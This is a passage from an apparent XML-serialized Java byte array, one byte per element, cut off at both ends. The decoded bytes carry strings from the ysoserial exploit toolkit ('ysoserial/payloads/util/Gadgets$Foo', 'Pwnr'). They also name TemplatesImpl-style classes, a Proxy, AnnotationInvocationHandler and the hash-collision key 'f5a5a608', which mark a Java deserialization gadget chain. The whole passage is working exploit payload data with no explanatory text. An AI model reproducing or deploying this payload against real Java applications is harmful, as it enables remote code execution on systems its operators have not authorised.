index=\"2710\"><byte>117</byte></void><void index=\"2711\"><byte>109</byte></void><void index=\"2712\"><byte>98</byte></void><void index=\"2713\"><byte>101</byte></void><void index=\"2714\"><byte>114</byte></void><void index=\"2715\"><byte>84</byte></void><void index=\"2716\"><byte>97</byte></void><void index=\"2717\"><byte>98</byte></void><void index=\"2718\"><byte>108</byte></void><void index=\"2719\"><byte>101</byte></void><void index=\"2720\"><byte>1</byte></void><void index=\"2721\"><byte>0</byte></void><void index=\"2722\"><byte>18</byte></void><void index=\"2723\"><byte>76</byte></void><void index=\"2724\"><byte>111</byte></void><void index=\"2725\"><byte>99</byte></void><void index=\"2726\"><byte>97</byte></void><void index=\"2727\"><byte>108</byte></void><void index=\"2728\"><byte>86</byte></void><void index=\"2729\"><byte>97</byte></void><void index=\"2730\"><byte>114</byte></void><void index=\"2731\"><byte>105</byte></void><void index=\"2732\"><byte>97</byte></void><void index=\"2733\"><byte>98</byte></void><void index=\"2734\"><byte>108</byte></void><void index=\"2735\"><byte>101</byte></void><void index=\"2736\"><byte>84</byte></void><void index=\"2737\"><byte>97</byte></void><void index=\"2738\"><byte>98</byte></void><void index=\"2739\"><byte>108</byte></void><void index=\"2740\"><byte>101</byte></void><void index=\"2741\"><byte>1</byte></void><void index=\"2742\"><byte>0</byte></void><void index=\"2743\"><byte>4</byte></void><void index=\"2744\"><byte>116</byte></void><void index=\"2745\"><byte>104</byte></void><void index=\"2746\"><byte>105</byte></void><void index=\"2747\"><byte>115</byte></void><void index=\"2748\"><byte>1</byte></void><void index=\"2749\"><byte>0</byte></void><void index=\"2750\"><byte>3</byte></void><void index=\"2751\"><byte>70</byte></void><void index=\"2752\"><byte>111</byte></void><void index=\"2753\"><byte>111</byte></void><void index=\"2754\"><byte>1</byte></void><void index=\"2755\"><byte>0</byte></void><void index=\"2756\"><byte>12</byte></void><void index=\"2757\"><byte>73</byte></void><void index=\"2758\"><byte>110</byte></void><void index=\"2759\"><byte>110</byte></void><void index=\"2760\"><byte>101</byte></void><void index=\"2761\"><byte>114</byte></void><void index=\"2762\"><byte>67</byte></void><void index=\"2763\"><byte>108</byte></void><void index=\"2764\"><byte>97</byte></void><void index=\"2765\"><byte>115</byte></void><void index=\"2766\"><byte>115</byte></void><void index=\"2767\"><byte>101</byte></void><void index=\"2768\"><byte>115</byte></void><void index=\"2769\"><byte>1</byte></void><void index=\"2770\"><byte>0</byte></void><void index=\"2771\"><byte>37</byte></void><void index=\"2772\"><byte>76</byte></void><void index=\"2773\"><byte>121</byte></void><void index=\"2774\"><byte>115</byte></void><void index=\"2775\"><byte>111</byte></void><void index=\"2776\"><byte>115</byte></void><void index=\"2777\"><byte>101</byte></void><void index=\"2778\"><byte>114</byte></void><void index=\"2779\"><byte>105</byte></void><void index=\"2780\"><byte>97</byte></void><void index=\"2781\"><byte>108</byte></void><void index=\"2782\"><byte>47</byte></void><void index=\"2783\"><byte>112</byte></void><void index=\"2784\"><byte>97</byte></void><void index=\"2785\"><byte>121</byte></void><void index=\"2786\"><byte>108</byte></void><void index=\"2787\"><byte>111</byte></void><void index=\"2788\"><byte>97</byte></void><void index=\"2789\"><byte>100</byte></void><void index=\"2790\"><byte>115</byte></void><void index=\"2791\"><byte>47</byte></void><void index=\"2792\"><byte>117</byte></void><void index=\"2793\"><byte>116</byte></void><void index=\"2794\"><byte>105</byte></void><void index=\"2795\"><byte>108</byte></void><void index=\"2796\"><byte>47</byte></void><void index=\"2797\"><byte>71</byte></void><void index=\"2798\"><byte>97</byte></void><void index=\"2799\"><byte>100</byte></void><void index=\"2800\"><byte>103</byte></void><void index=\"2801\"><byte>101</byte></void><void index=\"2802\"><byte>116</byte></void><void index=\"2803\"><byte>115</byte></void><void index=\"2804\"><byte>36</byte></void><void index=\"2805\"><byte>70</byte></void><void index=\"2806\"><byte>111</byte></void><void index=\"2807\"><byte>111</byte></void><void index=\"2808\"><byte>59</byte></void><void index=\"2809\"><byte>1</byte></void><void index=\"2810\"><byte>0</byte></void><void index=\"2811\"><byte>10</byte></void><void index=\"2812\"><byte>83</byte></void><void index=\"2813\"><byte>111</byte></void><void index=\"2814\"><byte>117</byte></void><void index=\"2815\"><byte>114</byte></void><void index=\"2816\"><byte>99</byte></void><void index=\"2817\"><byte>101</byte></void><void index=\"2818\"><byte>70</byte></void><void index=\"2819\"><byte>105</byte></void><void index=\"2820\"><byte>108</byte></void><void index=\"2821\"><byte>101</byte></void><void index=\"2822\"><byte>1</byte></void><void index=\"2823\"><byte>0</byte></void><void index=\"2824\"><byte>12</byte></void><void index=\"2825\"><byte>71</byte></void><void index=\"2826\"><byte>97</byte></void><void index=\"2827\"><byte>100</byte></void><void index=\"2828\"><byte>103</byte></void><void index=\"2829\"><byte>101</byte></void><void index=\"2830\"><byte>116</byte></void><void index=\"2831\"><byte>115</byte></void><void index=\"2832\"><byte>46</byte></void><void index=\"2833\"><byte>106</byte></void><void index=\"2834\"><byte>97</byte></void><void index=\"2835\"><byte>118</byte></void><void index=\"2836\"><byte>97</byte></void><void index=\"2837\"><byte>12</byte></void><void index=\"2838\"><byte>0</byte></void><void index=\"2839\"><byte>10</byte></void><void index=\"2840\"><byte>0</byte></void><void index=\"2841\"><byte>11</byte></void><void index=\"2842\"><byte>7</byte></void><void index=\"2843\"><byte>0</byte></void><void index=\"2844\"><byte>26</byte></void><void index=\"2845\"><byte>1</byte></void><void index=\"2846\"><byte>0</byte></void><void index=\"2847\"><byte>35</byte></void><void index=\"2848\"><byte>121</byte></void><void index=\"2849\"><byte>115</byte></void><void index=\"2850\"><byte>111</byte></void><void index=\"2851\"><byte>115</byte></void><void index=\"2852\"><byte>101</byte></void><void index=\"2853\"><byte>114</byte></void><void index=\"2854\"><byte>105</byte></void><void index=\"2855\"><byte>97</byte></void><void index=\"2856\"><byte>108</byte></void><void index=\"2857\"><byte>47</byte></void><void index=\"2858\"><byte>112</byte></void><void index=\"2859\"><byte>97</byte></void><void index=\"2860\"><byte>121</byte></void><void index=\"2861\"><byte>108</byte></void><void index=\"2862\"><byte>111</byte></void><void index=\"2863\"><byte>97</byte></void><void index=\"2864\"><byte>100</byte></void><void index=\"2865\"><byte>115</byte></void><void index=\"2866\"><byte>47</byte></void><void index=\"2867\"><byte>117</byte></void><void index=\"2868\"><byte>116</byte></void><void index=\"2869\"><byte>105</byte></void><void index=\"2870\"><byte>108</byte></void><void index=\"2871\"><byte>47</byte></void><void index=\"2872\"><byte>71</byte></void><void index=\"2873\"><byte>97</byte></void><void index=\"2874\"><byte>100</byte></void><void index=\"2875\"><byte>103</byte></void><void index=\"2876\"><byte>101</byte></void><void index=\"2877\"><byte>116</byte></void><void index=\"2878\"><byte>115</byte></void><void index=\"2879\"><byte>36</byte></void><void index=\"2880\"><byte>70</byte></void><void index=\"2881\"><byte>111</byte></void><void index=\"2882\"><byte>111</byte></void><void index=\"2883\"><byte>1</byte></void><void index=\"2884\"><byte>0</byte></void><void index=\"2885\"><byte>16</byte></void><void index=\"2886\"><byte>106</byte></void><void index=\"2887\"><byte>97</byte></void><void index=\"2888\"><byte>118</byte></void><void index=\"2889\"><byte>97</byte></void><void index=\"2890\"><byte>47</byte></void><void index=\"2891\"><byte>108</byte></void><void index=\"2892\"><byte>97</byte></void><void index=\"2893\"><byte>110</byte></void><void index=\"2894\"><byte>103</byte></void><void index=\"2895\"><byte>47</byte></void><void index=\"2896\"><byte>79</byte></void><void index=\"2897\"><byte>98</byte></void><void index=\"2898\"><byte>106</byte></void><void index=\"2899\"><byte>101</byte></void><void index=\"2900\"><byte>99</byte></void><void index=\"2901\"><byte>116</byte></void><void index=\"2902\"><byte>1</byte></void><void index=\"2903\"><byte>0</byte></void><void index=\"2904\"><byte>20</byte></void><void index=\"2905\"><byte>106</byte></void><void index=\"2906\"><byte>97</byte></void><void index=\"2907\"><byte>118</byte></void><void index=\"2908\"><byte>97</byte></void><void index=\"2909\"><byte>47</byte></void><void index=\"2910\"><byte>105</byte></void><void index=\"2911\"><byte>111</byte></void><void index=\"2912\"><byte>47</byte></void><void index=\"2913\"><byte>83</byte></void><void index=\"2914\"><byte>101</byte></void><void index=\"2915\"><byte>114</byte></void><void index=\"2916\"><byte>105</byte></void><void index=\"2917\"><byte>97</byte></void><void index=\"2918\"><byte>108</byte></void><void index=\"2919\"><byte>105</byte></void><void index=\"2920\"><byte>122</byte></void><void index=\"2921\"><byte>97</byte></void><void index=\"2922\"><byte>98</byte></void><void index=\"2923\"><byte>108</byte></void><void index=\"2924\"><byte>101</byte></void><void index=\"2925\"><byte>1</byte></void><void index=\"2926\"><byte>0</byte></void><void index=\"2927\"><byte>31</byte></void><void index=\"2928\"><byte>121</byte></void><void index=\"2929\"><byte>115</byte></void><void index=\"2930\"><byte>111</byte></void><void index=\"2931\"><byte>115</byte></void><void index=\"2932\"><byte>101</byte></void><void index=\"2933\"><byte>114</byte></void><void index=\"2934\"><byte>105</byte></void><void index=\"2935\"><byte>97</byte></void><void index=\"2936\"><byte>108</byte></void><void index=\"2937\"><byte>47</byte></void><void index=\"2938\"><byte>112</byte></void><void index=\"2939\"><byte>97</byte></void><void index=\"2940\"><byte>121</byte></void><void index=\"2941\"><byte>108</byte></void><void index=\"2942\"><byte>111</byte></void><void index=\"2943\"><byte>97</byte></void><void index=\"2944\"><byte>100</byte></void><void index=\"2945\"><byte>115</byte></void><void index=\"2946\"><byte>47</byte></void><void index=\"2947\"><byte>117</byte></void><void index=\"2948\"><byte>116</byte></void><void index=\"2949\"><byte>105</byte></void><void index=\"2950\"><byte>108</byte></void><void index=\"2951\"><byte>47</byte></void><void index=\"2952\"><byte>71</byte></void><void index=\"2953\"><byte>97</byte></void><void index=\"2954\"><byte>100</byte></void><void index=\"2955\"><byte>103</byte></void><void index=\"2956\"><byte>101</byte></void><void index=\"2957\"><byte>116</byte></void><void index=\"2958\"><byte>115</byte></void><void index=\"2959\"><byte>0</byte></void><void index=\"2960\"><byte>33</byte></void><void index=\"2961\"><byte>0</byte></void><void index=\"2962\"><byte>2</byte></void><void index=\"2963\"><byte>0</byte></void><void index=\"2964\"><byte>3</byte></void><void index=\"2965\"><byte>0</byte></void><void index=\"2966\"><byte>1</byte></void><void index=\"2967\"><byte>0</byte></void><void index=\"2968\"><byte>4</byte></void><void index=\"2969\"><byte>0</byte></void><void index=\"2970\"><byte>1</byte></void><void index=\"2971\"><byte>0</byte></void><void index=\"2972\"><byte>26</byte></void><void index=\"2973\"><byte>0</byte></void><void index=\"2974\"><byte>5</byte></void><void index=\"2975\"><byte>0</byte></void><void index=\"2976\"><byte>6</byte></void><void index=\"2977\"><byte>0</byte></void><void index=\"2978\"><byte>1</byte></void><void index=\"2979\"><byte>0</byte></void><void index=\"2980\"><byte>7</byte></void><void index=\"2981\"><byte>0</byte></void><void index=\"2982\"><byte>0</byte></void><void index=\"2983\"><byte>0</byte></void><void index=\"2984\"><byte>2</byte></void><void index=\"2985\"><byte>0</byte></void><void index=\"2986\"><byte>8</byte></void><void index=\"2987\"><byte>0</byte></void><void index=\"2988\"><byte>1</byte></void><void index=\"2989\"><byte>0</byte></void><void index=\"2990\"><byte>1</byte></void><void index=\"2991\"><byte>0</byte></void><void index=\"2992\"><byte>10</byte></void><void index=\"2993\"><byte>0</byte></void><void index=\"2994\"><byte>11</byte></void><void index=\"2995\"><byte>0</byte></void><void index=\"2996\"><byte>1</byte></void><void index=\"2997\"><byte>0</byte></void><void index=\"2998\"><byte>12</byte></void><void index=\"2999\"><byte>0</byte></void><void index=\"3000\"><byte>0</byte></void><void index=\"3001\"><byte>0</byte></void><void index=\"3002\"><byte>47</byte></void><void index=\"3003\"><byte>0</byte></void><void index=\"3004\"><byte>1</byte></void><void index=\"3005\"><byte>0</byte></void><void index=\"3006\"><byte>1</byte></void><void index=\"3007\"><byte>0</byte></void><void index=\"3008\"><byte>0</byte></void><void index=\"3009\"><byte>0</byte></void><void index=\"3010\"><byte>5</byte></void><void index=\"3011\"><byte>42</byte></void><void index=\"3012\"><byte>-73</byte></void><void index=\"3013\"><byte>0</byte></void><void index=\"3014\"><byte>1</byte></void><void index=\"3015\"><byte>-79</byte></void><void index=\"3016\"><byte>0</byte></void><void index=\"3017\"><byte>0</byte></void><void index=\"3018\"><byte>0</byte></void><void index=\"3019\"><byte>2</byte></void><void index=\"3020\"><byte>0</byte></void><void index=\"3021\"><byte>13</byte></void><void index=\"3022\"><byte>0</byte></void><void index=\"3023\"><byte>0</byte></void><void index=\"3024\"><byte>0</byte></void><void index=\"3025\"><byte>6</byte></void><void index=\"3026\"><byte>0</byte></void><void index=\"3027\"><byte>1</byte></void><void index=\"3028\"><byte>0</byte></void><void index=\"3029\"><byte>0</byte></void><void index=\"3030\"><byte>0</byte></void><void index=\"3031\"><byte>54</byte></void><void index=\"3032\"><byte>0</byte></void><void index=\"3033\"><byte>14</byte></void><void index=\"3034\"><byte>0</byte></void><void index=\"3035\"><byte>0</byte></void><void index=\"3036\"><byte>0</byte></void><void index=\"3037\"><byte>12</byte></void><void index=\"3038\"><byte>0</byte></void><void index=\"3039\"><byte>1</byte></void><void index=\"3040\"><byte>0</byte></void><void index=\"3041\"><byte>0</byte></void><void index=\"3042\"><byte>0</byte></void><void index=\"3043\"><byte>5</byte></void><void index=\"3044\"><byte>0</byte></void><void index=\"3045\"><byte>15</byte></void><void index=\"3046\"><byte>0</byte></void><void index=\"3047\"><byte>18</byte></void><void index=\"3048\"><byte>0</byte></void><void index=\"3049\"><byte>0</byte></void><void index=\"3050\"><byte>0</byte></void><void index=\"3051\"><byte>2</byte></void><void index=\"3052\"><byte>0</byte></void><void index=\"3053\"><byte>19</byte></void><void index=\"3054\"><byte>0</byte></void><void index=\"3055\"><byte>0</byte></void><void index=\"3056\"><byte>0</byte></void><void index=\"3057\"><byte>2</byte></void><void index=\"3058\"><byte>0</byte></void><void index=\"3059\"><byte>20</byte></void><void index=\"3060\"><byte>0</byte></void><void index=\"3061\"><byte>17</byte></void><void index=\"3062\"><byte>0</byte></void><void index=\"3063\"><byte>0</byte></void><void index=\"3064\"><byte>0</byte></void><void index=\"3065\"><byte>10</byte></void><void index=\"3066\"><byte>0</byte></void><void index=\"3067\"><byte>1</byte></void><void index=\"3068\"><byte>0</byte></void><void index=\"3069\"><byte>2</byte></void><void index=\"3070\"><byte>0</byte></void><void index=\"3071\"><byte>22</byte></void><void index=\"3072\"><byte>0</byte></void><void index=\"3073\"><byte>16</byte></void><void index=\"3074\"><byte>0</byte></void><void index=\"3075\"><byte>9</byte></void><void index=\"3076\"><byte>112</byte></void><void index=\"3077\"><byte>116</byte></void><void index=\"3078\"><byte>0</byte></void><void index=\"3079\"><byte>4</byte></void><void index=\"3080\"><byte>80</byte></void><void index=\"3081\"><byte>119</byte></void><void index=\"3082\"><byte>110</byte></void><void index=\"3083\"><byte>114</byte></void><void index=\"3084\"><byte>112</byte></void><void index=\"3085\"><byte>119</byte></void><void index=\"3086\"><byte>1</byte></void><void index=\"3087\"><byte>0</byte></void><void index=\"3088\"><byte>120</byte></void><void index=\"3089\"><byte>115</byte></void><void index=\"3090\"><byte>125</byte></void><void index=\"3091\"><byte>0</byte></void><void index=\"3092\"><byte>0</byte></void><void index=\"3093\"><byte>0</byte></void><void index=\"3094\"><byte>1</byte></void><void index=\"3095\"><byte>0</byte></void><void index=\"3096\"><byte>29</byte></void><void index=\"3097\"><byte>106</byte></void><void index=\"3098\"><byte>97</byte></void><void index=\"3099\"><byte>118</byte></void><void index=\"3100\"><byte>97</byte></void><void index=\"3101\"><byte>120</byte></void><void index=\"3102\"><byte>46</byte></void><void index=\"3103\"><byte>120</byte></void><void index=\"3104\"><byte>109</byte></void><void index=\"3105\"><byte>108</byte></void><void index=\"3106\"><byte>46</byte></void><void index=\"3107\"><byte>116</byte></void><void index=\"3108\"><byte>114</byte></void><void index=\"3109\"><byte>97</byte></void><void index=\"3110\"><byte>110</byte></void><void index=\"3111\"><byte>115</byte></void><void index=\"3112\"><byte>102</byte></void><void index=\"3113\"><byte>111</byte></void><void index=\"3114\"><byte>114</byte></void><void index=\"3115\"><byte>109</byte></void><void index=\"3116\"><byte>46</byte></void><void index=\"3117\"><byte>84</byte></void><void index=\"3118\"><byte>101</byte></void><void index=\"3119\"><byte>109</byte></void><void index=\"3120\"><byte>112</byte></void><void index=\"3121\"><byte>108</byte></void><void index=\"3122\"><byte>97</byte></void><void index=\"3123\"><byte>116</byte></void><void index=\"3124\"><byte>101</byte></void><void index=\"3125\"><byte>115</byte></void><void index=\"3126\"><byte>120</byte></void><void index=\"3127\"><byte>114</byte></void><void index=\"3128\"><byte>0</byte></void><void index=\"3129\"><byte>23</byte></void><void index=\"3130\"><byte>106</byte></void><void index=\"3131\"><byte>97</byte></void><void index=\"3132\"><byte>118</byte></void><void index=\"3133\"><byte>97</byte></void><void index=\"3134\"><byte>46</byte></void><void index=\"3135\"><byte>108</byte></void><void index=\"3136\"><byte>97</byte></void><void index=\"3137\"><byte>110</byte></void><void index=\"3138\"><byte>103</byte></void><void index=\"3139\"><byte>46</byte></void><void index=\"3140\"><byte>114</byte></void><void index=\"3141\"><byte>101</byte></void><void index=\"3142\"><byte>102</byte></void><void index=\"3143\"><byte>108</byte></void><void index=\"3144\"><byte>101</byte></void><void index=\"3145\"><byte>99</byte></void><void index=\"3146\"><byte>116</byte></void><void index=\"3147\"><byte>46</byte></void><void index=\"3148\"><byte>80</byte></void><void index=\"3149\"><byte>114</byte></void><void index=\"3150\"><byte>111</byte></void><void index=\"3151\"><byte>120</byte></void><void index=\"3152\"><byte>121</byte></void><void index=\"3153\"><byte>-31</byte></void><void index=\"3154\"><byte>39</byte></void><void index=\"3155\"><byte>-38</byte></void><void index=\"3156\"><byte>32</byte></void><void index=\"3157\"><byte>-52</byte></void><void index=\"3158\"><byte>16</byte></void><void index=\"3159\"><byte>67</byte></void><void index=\"3160\"><byte>-53</byte></void><void index=\"3161\"><byte>2</byte></void><void index=\"3162\"><byte>0</byte></void><void index=\"3163\"><byte>1</byte></void><void index=\"3164\"><byte>76</byte></void><void index=\"3165\"><byte>0</byte></void><void index=\"3166\"><byte>1</byte></void><void index=\"3167\"><byte>104</byte></void><void index=\"3168\"><byte>116</byte></void><void index=\"3169\"><byte>0</byte></void><void index=\"3170\"><byte>37</byte></void><void index=\"3171\"><byte>76</byte></void><void index=\"3172\"><byte>106</byte></void><void index=\"3173\"><byte>97</byte></void><void index=\"3174\"><byte>118</byte></void><void index=\"3175\"><byte>97</byte></void><void index=\"3176\"><byte>47</byte></void><void index=\"3177\"><byte>108</byte></void><void index=\"3178\"><byte>97</byte></void><void index=\"3179\"><byte>110</byte></void><void index=\"3180\"><byte>103</byte></void><void index=\"3181\"><byte>47</byte></void><void index=\"3182\"><byte>114</byte></void><void index=\"3183\"><byte>101</byte></void><void index=\"3184\"><byte>102</byte></void><void index=\"3185\"><byte>108</byte></void><void index=\"3186\"><byte>101</byte></void><void index=\"3187\"><byte>99</byte></void><void index=\"3188\"><byte>116</byte></void><void index=\"3189\"><byte>47</byte></void><void index=\"3190\"><byte>73</byte></void><void index=\"3191\"><byte>110</byte></void><void index=\"3192\"><byte>118</byte></void><void index=\"3193\"><byte>111</byte></void><void index=\"3194\"><byte>99</byte></void><void index=\"3195\"><byte>97</byte></void><void index=\"3196\"><byte>116</byte></void><void index=\"3197\"><byte>105</byte></void><void index=\"3198\"><byte>111</byte></void><void index=\"3199\"><byte>110</byte></void><void index=\"3200\"><byte>72</byte></void><void index=\"3201\"><byte>97</byte></void><void index=\"3202\"><byte>110</byte></void><void index=\"3203\"><byte>100</byte></void><void index=\"3204\"><byte>108</byte></void><void index=\"3205\"><byte>101</byte></void><void index=\"3206\"><byte>114</byte></void><void index=\"3207\"><byte>59</byte></void><void index=\"3208\"><byte>120</byte></void><void index=\"3209\"><byte>112</byte></void><void index=\"3210\"><byte>115</byte></void><void index=\"3211\"><byte>114</byte></void><void index=\"3212\"><byte>0</byte></void><void index=\"3213\"><byte>50</byte></void><void index=\"3214\"><byte>115</byte></void><void index=\"3215\"><byte>117</byte></void><void index=\"3216\"><byte>110</byte></void><void index=\"3217\"><byte>46</byte></void><void index=\"3218\"><byte>114</byte></void><void index=\"3219\"><byte>101</byte></void><void index=\"3220\"><byte>102</byte></void><void index=\"3221\"><byte>108</byte></void><void index=\"3222\"><byte>101</byte></void><void index=\"3223\"><byte>99</byte></void><void index=\"3224\"><byte>116</byte></void><void index=\"3225\"><byte>46</byte></void><void index=\"3226\"><byte>97</byte></void><void index=\"3227\"><byte>110</byte></void><void index=\"3228\"><byte>110</byte></void><void index=\"3229\"><byte>111</byte></void><void index=\"3230\"><byte>116</byte></void><void index=\"3231\"><byte>97</byte></void><void index=\"3232\"><byte>116</byte></void><void index=\"3233\"><byte>105</byte></void><void index=\"3234\"><byte>111</byte></void><void index=\"3235\"><byte>110</byte></void><void index=\"3236\"><byte>46</byte></void><void index=\"3237\"><byte>65</byte></void><void index=\"3238\"><byte>110</byte></void><void index=\"3239\"><byte>110</byte></void><void index=\"3240\"><byte>111</byte></void><void index=\"3241\"><byte>116</byte></void><void index=\"3242\"><byte>97</byte></void><void index=\"3243\"><byte>116</byte></void><void index=\"3244\"><byte>105</byte></void><void index=\"3245\"><byte>111</byte></void><void index=\"3246\"><byte>110</byte></void><void index=\"3247\"><byte>73</byte></void><void index=\"3248\"><byte>110</byte></void><void index=\"3249\"><byte>118</byte></void><void index=\"3250\"><byte>111</byte></void><void index=\"3251\"><byte>99</byte></void><void index=\"3252\"><byte>97</byte></void><void index=\"3253\"><byte>116</byte></void><void index=\"3254\"><byte>105</byte></void><void index=\"3255\"><byte>111</byte></void><void index=\"3256\"><byte>110</byte></void><void index=\"3257\"><byte>72</byte></void><void index=\"3258\"><byte>97</byte></void><void index=\"3259\"><byte>110</byte></void><void index=\"3260\"><byte>100</byte></void><void index=\"3261\"><byte>108</byte></void><void index=\"3262\"><byte>101</byte></void><void index=\"3263\"><byte>114</byte></void><void index=\"3264\"><byte>85</byte></void><void index=\"3265\"><byte>-54</byte></void><void index=\"3266\"><byte>-11</byte></void><void index=\"3267\"><byte>15</byte></void><void index=\"3268\"><byte>21</byte></void><void index=\"3269\"><byte>-53</byte></void><void index=\"3270\"><byte>126</byte></void><void index=\"3271\"><byte>-91</byte></void><void index=\"3272\"><byte>2</byte></void><void index=\"3273\"><byte>0</byte></void><void index=\"3274\"><byte>2</byte></void><void index=\"3275\"><byte>76</byte></void><void index=\"3276\"><byte>0</byte></void><void index=\"3277\"><byte>12</byte></void><void index=\"3278\"><byte>109</byte></void><void index=\"3279\"><byte>101</byte></void><void index=\"3280\"><byte>109</byte></void><void index=\"3281\"><byte>98</byte></void><void index=\"3282\"><byte>101</byte></void><void index=\"3283\"><byte>114</byte></void><void index=\"3284\"><byte>86</byte></void><void index=\"3285\"><byte>97</byte></void><void index=\"3286\"><byte>108</byte></void><void index=\"3287\"><byte>117</byte></void><void index=\"3288\"><byte>101</byte></void><void index=\"3289\"><byte>115</byte></void><void index=\"3290\"><byte>116</byte></void><void index=\"3291\"><byte>0</byte></void><void index=\"3292\"><byte>15</byte></void><void index=\"3293\"><byte>76</byte></void><void index=\"3294\"><byte>106</byte></void><void index=\"3295\"><byte>97</byte></void><void index=\"3296\"><byte>118</byte></void><void index=\"3297\"><byte>97</byte></void><void index=\"3298\"><byte>47</byte></void><void index=\"3299\"><byte>117</byte></void><void index=\"3300\"><byte>116</byte></void><void index=\"3301\"><byte>105</byte></void><void index=\"3302\"><byte>108</byte></void><void index=\"3303\"><byte>47</byte></void><void index=\"3304\"><byte>77</byte></void><void index=\"3305\"><byte>97</byte></void><void index=\"3306\"><byte>112</byte></void><void index=\"3307\"><byte>59</byte></void><void index=\"3308\"><byte>76</byte></void><void index=\"3309\"><byte>0</byte></void><void index=\"3310\"><byte>4</byte></void><void index=\"3311\"><byte>116</byte></void><void index=\"3312\"><byte>121</byte></void><void index=\"3313\"><byte>112</byte></void><void index=\"3314\"><byte>101</byte></void><void index=\"3315\"><byte>116</byte></void><void index=\"3316\"><byte>0</byte></void><void index=\"3317\"><byte>17</byte></void><void index=\"3318\"><byte>76</byte></void><void index=\"3319\"><byte>106</byte></void><void index=\"3320\"><byte>97</byte></void><void index=\"3321\"><byte>118</byte></void><void index=\"3322\"><byte>97</byte></void><void index=\"3323\"><byte>47</byte></void><void index=\"3324\"><byte>108</byte></void><void index=\"3325\"><byte>97</byte></void><void index=\"3326\"><byte>110</byte></void><void index=\"3327\"><byte>103</byte></void><void index=\"3328\"><byte>47</byte></void><void index=\"3329\"><byte>67</byte></void><void index=\"3330\"><byte>108</byte></void><void index=\"3331\"><byte>97</byte></void><void index=\"3332\"><byte>115</byte></void><void index=\"3333\"><byte>115</byte></void><void index=\"3334\"><byte>59</byte></void><void index=\"3335\"><byte>120</byte></void><void index=\"3336\"><byte>112</byte></void><void index=\"3337\"><byte>115</byte></void><void index=\"3338\"><byte>114</byte></void><void index=\"3339\"><byte>0</byte></void><void index=\"3340\"><byte>17</byte></void><void index=\"3341\"><byte>106</byte></void><void index=\"3342\"><byte>97</byte></void><void index=\"3343\"><byte>118</byte></void><void index=\"3344\"><byte>97</byte></void><void index=\"3345\"><byte>46</byte></void><void index=\"3346\"><byte>117</byte></void><void index=\"3347\"><byte>116</byte></void><void index=\"3348\"><byte>105</byte></void><void index=\"3349\"><byte>108</byte></void><void index=\"3350\"><byte>46</byte></void><void index=\"3351\"><byte>72</byte></void><void index=\"3352\"><byte>97</byte></void><void index=\"3353\"><byte>115</byte></void><void index=\"3354\"><byte>104</byte></void><void index=\"3355\"><byte>77</byte></void><void index=\"3356\"><byte>97</byte></void><void index=\"3357\"><byte>112</byte></void><void index=\"3358\"><byte>5</byte></void><void index=\"3359\"><byte>7</byte></void><void index=\"3360\"><byte>-38</byte></void><void index=\"3361\"><byte>-63</byte></void><void index=\"3362\"><byte>-61</byte></void><void index=\"3363\"><byte>22</byte></void><void index=\"3364\"><byte>96</byte></void><void index=\"3365\"><byte>-47</byte></void><void index=\"3366\"><byte>3</byte></void><void index=\"3367\"><byte>0</byte></void><void index=\"3368\"><byte>2</byte></void><void index=\"3369\"><byte>70</byte></void><void index=\"3370\"><byte>0</byte></void><void index=\"3371\"><byte>10</byte></void><void index=\"3372\"><byte>108</byte></void><void index=\"3373\"><byte>111</byte></void><void index=\"3374\"><byte>97</byte></void><void index=\"3375\"><byte>100</byte></void><void index=\"3376\"><byte>70</byte></void><void index=\"3377\"><byte>97</byte></void><void index=\"3378\"><byte>99</byte></void><void index=\"3379\"><byte>116</byte></void><void index=\"3380\"><byte>111</byte></void><void index=\"3381\"><byte>114</byte></void><void index=\"3382\"><byte>73</byte></void><void index=\"3383\"><byte>0</byte></void><void index=\"3384\"><byte>9</byte></void><void index=\"3385\"><byte>116</byte></void><void index=\"3386\"><byte>104</byte></void><void index=\"3387\"><byte>114</byte></void><void index=\"3388\"><byte>101</byte></void><void index=\"3389\"><byte>115</byte></void><void index=\"3390\"><byte>104</byte></void><void index=\"3391\"><byte>111</byte></void><void index=\"3392\"><byte>108</byte></void><void index=\"3393\"><byte>100</byte></void><void index=\"3394\"><byte>120</byte></void><void index=\"3395\"><byte>112</byte></void><void index=\"3396\"><byte>63</byte></void><void index=\"3397\"><byte>64</byte></void><void index=\"3398\"><byte>0</byte></void><void index=\"3399\"><byte>0</byte></void><void index=\"3400\"><byte>0</byte></void><void index=\"3401\"><byte>0</byte></void><void index=\"3402\"><byte>0</byte></void><void index=\"3403\"><byte>12</byte></void><void index=\"3404\"><byte>119</byte></void><void index=\"3405\"><byte>8</byte></void><void index=\"3406\"><byte>0</byte></void><void index=\"3407\"><byte>0</byte></void><void index=\"3408\"><byte>0</byte></void><void index=\"3409\"><byte>16</byte></void><void index=\"3410\"><byte>0</byte></void><void index=\"3411\"><byte>0</byte></void><void index=\"3412\"><byte>0</byte></void><void index=\"3413\"><byte>1</byte></void><void index=\"3414\"><byte>116</byte></void><void index=\"3415\"><byte>0</byte></void><void index=\"3416\"><byte>8</byte></void><void index=\"3417\"><byte>102</byte></void><void index=\"3418\"><byte>53</byte></void><void index=\"3419\"><byte>97</byte></void><void index=\"3420\"><byte>53</byte></void><void index=\"3421\"><byte>97</byte></void><void index=\"3422\"><byte>54</byte></void><void index=\"3423\"><byte>48</byte></void><void index=\"3424\"><byte>56</byte></void><void index=\"3425\"><byte>113</byte></void><void index=\"3426\"><byte>0</byte></void><void index=\"3427\"><byte>126</byte></void><void index=\"3428\"><byte>0</byte></void><void index=\"3429\"><byte>8</byte></void><void index=\"3430\"><byte>120</byte></void><void index=\"3431\"><byte>118</byte></void><void index=\"3432\"><byte>114</byte></void><void index=\"3433\"><byte>0</byte></void><void index=\"3434\"><byte>29</byte></void><void index=\"3435\"><byte>106</byte></void><void index=\"3436\"><byte>97</byte></void><void index=\"3437\"><byte>118</byte></void><void index=\"3438\"><byte>97</byte></void><void index=\"3439\"><byte>120</byte></void><void index=\"3440\"><byte>46</byte></void><void index=\"3441\"><byte>120</byte></void><void index=\"3442\"><byte>109</byte></void><void index=\"3443\"><byte>108</byte></void><void index=\"3444\"><byte>46</byte></void><void index=\"3445\"><byte>116</byte></void><void index=\"3446\"><byte>114</byte></void><void index=\"3447\"><byte>97</byte></void><void index=\"3448\"><byte>110</byte></void><void index=\"3449\"><byte>115</byte></void><void index=\"3450\"><byte>102</byte></void><void index=\"3451\"><byte>111</byte></void><void index=\"3452\"><byte>114</byte></void><void index=\"3453\"><byte>109</byte></void><void index=\"3454\"><byte>46</byte></void><void index=\"3455\"><byte>84</byte></void><void index=\"3456\"><byte>101</byte></void><void index=\"3457\"><byte>109</byte></void><void index=\"3458\"><byte>112</byte></void><void 